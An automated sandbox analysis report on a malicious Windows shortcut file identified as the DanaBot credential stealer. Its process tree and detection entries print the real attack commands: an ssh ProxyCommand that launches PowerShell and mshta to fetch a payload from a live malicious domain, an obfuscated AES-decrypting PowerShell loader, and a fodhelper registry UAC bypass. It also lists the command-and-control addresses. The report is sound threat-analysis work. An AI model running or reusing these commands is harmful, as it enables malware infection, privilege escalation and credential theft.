Windows Analysis Report
vreFmptfUu.lnk

Overview

General Information

Sample name: vreFmptfUu.lnk (renamed because original name is a hash value)
Original sample name: 0fd3c13d822c330db0ff496a85ba3d91.lnk
Analysis ID: 1581224
MD5: 0fd3c13d822c330db0ff496a85ba3d91
SHA1: 418fca575accf1c328dd30ce218072c278fcbd37
SHA256: ac09a4ccc5885bd8cd9382802014f6a8eacf7ff53d50b88cc6a8a43b1732a5d3
Tags: lnk, user-abuse_ch

Detection

DanaBot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Yara detected DanaBot stealer dll
AI detected suspicious sample
Machine Learning detection for dropped file
May use the Tor software to hide its network traffic
Powershell drops PE file
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sigma detected: Bypass UAC via Fodhelper.exe
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Uses cmd line tools excessively to alter registry or file data
Windows shortcut file (LNK) contains suspicious command line arguments
Abnormal high CPU Usage
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries the installation date of Windows
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Lolbin Ssh.exe Use As Proxy
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • ssh.exe (PID: 7536 cmdline: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'DX0ucZQ[=V?uY\Xmshta https://pravo-bashkortostan.ru/aaa.mp4DX0ucZQ[=V?uY\X'.SubString(15, 44)" . MD5: C05426E6F6DFB30FB78FBA874A2FF7DC)
    • conhost.exe (PID: 7544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7636 cmdline: powershell powershell -Command 'DX0ucZQ[=V?uY\Xmshta https://pravo-bashkortostan.ru/aaa.mp4DX0ucZQ[=V?uY\X'.SubString(15, 44) MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7836 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://pravo-bashkortostan.ru/aaa.mp4" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • mshta.exe (PID: 7936 cmdline: "C:\Windows\system32\mshta.exe" https://pravo-bashkortostan.ru/aaa.mp4 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
          • powershell.exe (PID: 180 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KYLfE($jfvKN){return -split ($jfvKN -replace '..', '0x$& ')};$ggUL = KYLf[...]ob=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((KYLfE('4344494372736B6F7955464B61484843')),[byte[]]::new(16)).TransformFinalBlock($ggUL,0,$ggUL.Length)); & $PYGob.Substring(0,3) $PYGob.Substring(283) MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 1824 cmdline: "C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • reg.exe (PID: 7556 cmdline: REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user\AppData\Local\Temp\r.bat" /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
              • reg.exe (PID: 1436 cmdline: REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
              • fodhelper.exe (PID: 7672 cmdline: FoDHelper.exe MD5: 85018BE1FD913656BC9FF541F017EACD)
                • cmd.exe (PID: 2112 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\r.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 7884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • cmd.exe (PID: 7860 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\r.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                    • conhost.exe (PID: 7872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                    • powershell.exe (PID: 7688 cmdline: powershell.exe -w 1 -ep Unrestricted -nop MD5: 04029E121A0CFA5991749937DD22A1D9)
                      • conhost.exe (PID: 7652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 6920 cmdline: "C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • reg.exe (PID: 6680 cmdline: REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
              • reg.exe (PID: 7556 cmdline: REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
            • Acrobat.exe (PID: 7872 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\ggg.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
              • AcroCEF.exe (PID: 2228 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
                • AcroCEF.exe (PID: 2796 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1592,i,1127921047332727915,3798785087660649404,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
            • cmd.exe (PID: 8536 cmdline: "C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • reg.exe (PID: 8556 cmdline: REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user\AppData\Local\Temp\r.bat" /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
              • reg.exe (PID: 8576 cmdline: REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
              • fodhelper.exe (PID: 8592 cmdline: FoDHelper.exe MD5: 85018BE1FD913656BC9FF541F017EACD)
                • cmd.exe (PID: 8632 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\r.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 8640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • cmd.exe (PID: 8700 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\r.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                    • conhost.exe (PID: 8708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                    • mama.exe (PID: 8756 cmdline: C:\Users\user\AppData\Roaming\mama.exe MD5: 72B6B07175EF611CE7DAA959A1248AAE)
                      • cmd.exe (PID: 8908 cmdline: cmd.exe /C wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                        • conhost.exe (PID: 8916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                        • WMIC.exe (PID: 8948 cmdline: wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value MD5: E2DE6500DE1148C7F6027AD50AC8B891)
            • cmd.exe (PID: 8776 cmdline: "C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • reg.exe (PID: 8792 cmdline: REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
              • reg.exe (PID: 8808 cmdline: REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • svchost.exe (PID: 6072 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
Name: DanaBot
Description: Proofpoint describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on quality over quantity in email-based threats. DanaBot's modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker.
Attribution: SCULLY SPIDER
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.danabot
No configs have been found
Source: 0000002B.00000003.1621114893.000000007E960000.00000004.00001000.00020000.00000000.sdmp; Rule: JoeSecurity_DanaBot_stealer_dll; Description: Yara detected DanaBot stealer dll; Author: Joe Security
Source: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmp; Rule: JoeSecurity_CredentialStealer; Description: Yara detected Credential Stealer; Author: Joe Security
Source: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmp; Rule: JoeSecurity_DanaBot_stealer_dll; Description: Yara detected DanaBot stealer dll; Author: Joe Security
Source: Process Memory Space: powershell.exe PID: 180; Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC; Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
Source: Process Memory Space: mama.exe PID: 8756; Rule: JoeSecurity_CredentialStealer; Description: Yara detected Credential Stealer; Author: Joe Security

          System Summary

          Source: Process started; Author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community; Data: Command: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\r.bat" ", CommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\r.bat" ", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: FoDHelper.exe, ParentImage: C:\Windows\System32\fodhelper.exe, ParentProcessId: 7672, ParentProcessName: fodhelper.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\r.bat" ", ProcessId: 2112, ProcessName: cmd.exe
          Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: "C:\Windows\system32\mshta.exe" https://pravo-bashkortostan.ru/aaa.mp4, CommandLine: "C:\Windows\system32\mshta.exe" https://pravo-bashkortostan.ru/aaa.mp4, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://pravo-bashkortostan.ru/aaa.mp4", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7836, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://pravo-bashkortostan.ru/aaa.mp4, ProcessId: 7936, ProcessName: mshta.exe
          Source: File created; Author: Subhash Popuri (@pbssubhash); Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 180, TargetFilename: C:\Users\user\AppData\Local\Temp\r.bat
          Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KYLfE($jfvKN){return -split ($jfvKN -replace '..', '0x$& ')};$ggUL = KYLf[...]
          Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KYLfE($jfvKN){return -split ($jfvKN -replace '..', '0x$& ')};$ggUL = KYLfE('[...]
          Source: Process started; Author: frack113, Nasreddine Bencherchali; Data: Command: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'DX0ucZQ[=V?uY\Xmshta https://pravo-bashkortostan.ru/aaa.mp4DX0ucZQ[=V?uY\X'.SubString(15, 44)" ., CommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'DX0ucZQ[=V?uY\Xmshta https://pravo-bashkortostan.ru/aaa.mp4DX0ucZQ[=V?uY\X'.SubString(15, 44)" ., CommandLine|base64offset|contains: , Image: C:\Windows\System32\OpenSSH\ssh.exe, NewProcessName: C:\Windows\System32\OpenSSH\ssh.exe, OriginalFileName: C:\Windows\System32\OpenSSH\ssh.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'DX0ucZQ[=V?uY\Xmshta https://pravo-bashkortostan.ru/aaa.mp4DX0ucZQ[=V?uY\X'.SubString(15, 44)" ., ProcessId: 7536, ProcessName: ssh.exe
          Source: File created; Author: frack113, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 180, TargetFilename: C:\Users\user\AppData\Local\Temp\r.bat
          Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell powershell -Command 'DX0ucZQ[=V?uY\Xmshta https://pravo-bashkortostan.ru/aaa.mp4DX0ucZQ[=V?uY\X'.SubString(15, 44), CommandLine: powershell powershell -Command 'DX0ucZQ[=V?uY\Xmshta https://pravo-bashkortostan.ru/aaa.mp4DX0ucZQ[=V?uY\X'.SubString(15, 44), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'DX0ucZQ[=V?uY\Xmshta https://pravo-bashkortostan.ru/aaa.mp4DX0ucZQ[=V?uY\X'.SubString(15, 44)" ., ParentImage: C:\Windows\System32\OpenSSH\ssh.exe, ParentProcessId: 7536, ParentProcessName: ssh.exe, ProcessCommandLine: powershell powershell -Command 'DX0ucZQ[=V?uY\Xmshta https://pravo-bashkortostan.ru/aaa.mp4DX0ucZQ[=V?uY\X'.SubString(15, 44), ProcessId: 7636, ProcessName: powershell.exe
          Source: Process started; Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KYLfE($jfvKN){return -split ($jfvKN -replace '..', '0x$& ')};$ggUL = KYLf[...]
          Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6072, ProcessName: svchost.exe
          Timestamp: 2024-12-27T08:47:51.466422+0100; SID: 2803305; Severity: 3; Classtype: Unknown Traffic; Source IP: 192.168.2.10; Source Port: 49741; Destination IP: 150.241.97.10; Destination Port: 443; Protocol: TCP

          AV Detection

          Source: C:\Users\user\AppData\Roaming\mama.exe; Avira: detection malicious, Label: TR/ATRAPS.Gen
          Source: C:\Users\user\AppData\Roaming\mama.exe; ReversingLabs: Detection: 71%
          Source: vreFmptfUu.lnk; ReversingLabs: Detection: 36%
          Source: vreFmptfUu.lnk; Virustotal: Detection: 39%
          Source: Yara match; File source: 0000002B.00000003.1621114893.000000007E960000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: Process Memory Space: mama.exe PID: 8756, type: MEMORYSTR
          Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.7% probability
          Source: C:\Users\user\AppData\Roaming\mama.exe; Joe Sandbox ML: detected
          Source: unknown; HTTPS traffic detected: 150.241.97.10:443 -> 192.168.2.10:49708 version: TLS 1.2
          Source: unknown; HTTPS traffic detected: 150.241.97.10:443 -> 192.168.2.10:49728 version: TLS 1.2
          Source: C:\Users\user\AppData\Roaming\mama.exe; Code function: 43_2_02F7E190 FindFirstFileW,FindClose,43_2_02F7E190
          Source: C:\Users\user\AppData\Roaming\mama.exe; Code function: 43_2_02F7DBC4 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,43_2_02F7DBC4
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft

          Networking

          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:49928 -> 94.131.118.216:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:49967 -> 188.132.183.159:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:49983 -> 188.132.183.159:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:49961 -> 94.131.118.216:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:49987 -> 188.132.183.159:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:49954 -> 188.132.183.159:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:49985 -> 94.131.118.216:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50015 -> 188.132.183.159:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50029 -> 188.132.183.159:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50021 -> 206.206.125.221:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50027 -> 94.131.118.216:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50034 -> 188.132.183.159:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50037 -> 188.132.183.159:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50036 -> 94.131.118.216:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50052 -> 94.131.118.216:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50059 -> 206.206.125.221:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50045 -> 188.132.183.159:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50043 -> 206.206.125.221:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50051 -> 206.206.125.221:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50053 -> 188.132.183.159:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50035 -> 206.206.125.221:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50067 -> 206.206.125.221:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50066 -> 188.132.183.159:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50083 -> 206.206.125.221:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50069 -> 188.132.183.159:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50060 -> 94.131.118.216:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50077 -> 188.132.183.159:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50090 -> 188.132.183.159:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50085 -> 188.132.183.159:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50092 -> 94.131.118.216:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50042 -> 188.132.183.159:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50076 -> 94.131.118.216:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50082 -> 188.132.183.159:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:49921 -> 188.132.183.159:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50091 -> 206.206.125.221:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50061 -> 188.132.183.159:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:49923 -> 206.206.125.221:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50050 -> 188.132.183.159:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50075 -> 206.206.125.221:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:49930 -> 188.132.183.159:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50044 -> 94.131.118.216:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50068 -> 94.131.118.216:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:49958 -> 206.206.125.221:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:49984 -> 206.206.125.221:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50058 -> 188.132.183.159:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50093 -> 188.132.183.159:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50074 -> 188.132.183.159:443
          Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.10:50084 -> 94.131.118.216:443
          Source: global traffic | HTTP traffic detected:
              GET /ggg.pdf HTTP/1.1
              Host: pravo-bashkortostan.ru
              Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected:
              GET /mama.exe HTTP/1.1
              Host: pravo-bashkortostan.ru
          Source: Joe Sandbox View | ASN Name: PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR
          Source: Joe Sandbox View | ASN Name: HYPEENT-SJUS
          Source: Joe Sandbox View | ASN Name: NASSIST-ASGI
          Source: Joe Sandbox View | ASN Name: TECNALIAES
          Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49741 -> 150.241.97.10:443
          Source: global traffic | HTTP traffic detected:
              GET /aaa.mp4 HTTP/1.1
              Accept: */*
              Accept-Language: en-CH
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
              Host: pravo-bashkortostan.ru
              Connection: Keep-Alive
          Source: unknown | TCP traffic detected without corresponding DNS query: 188.132.183.159
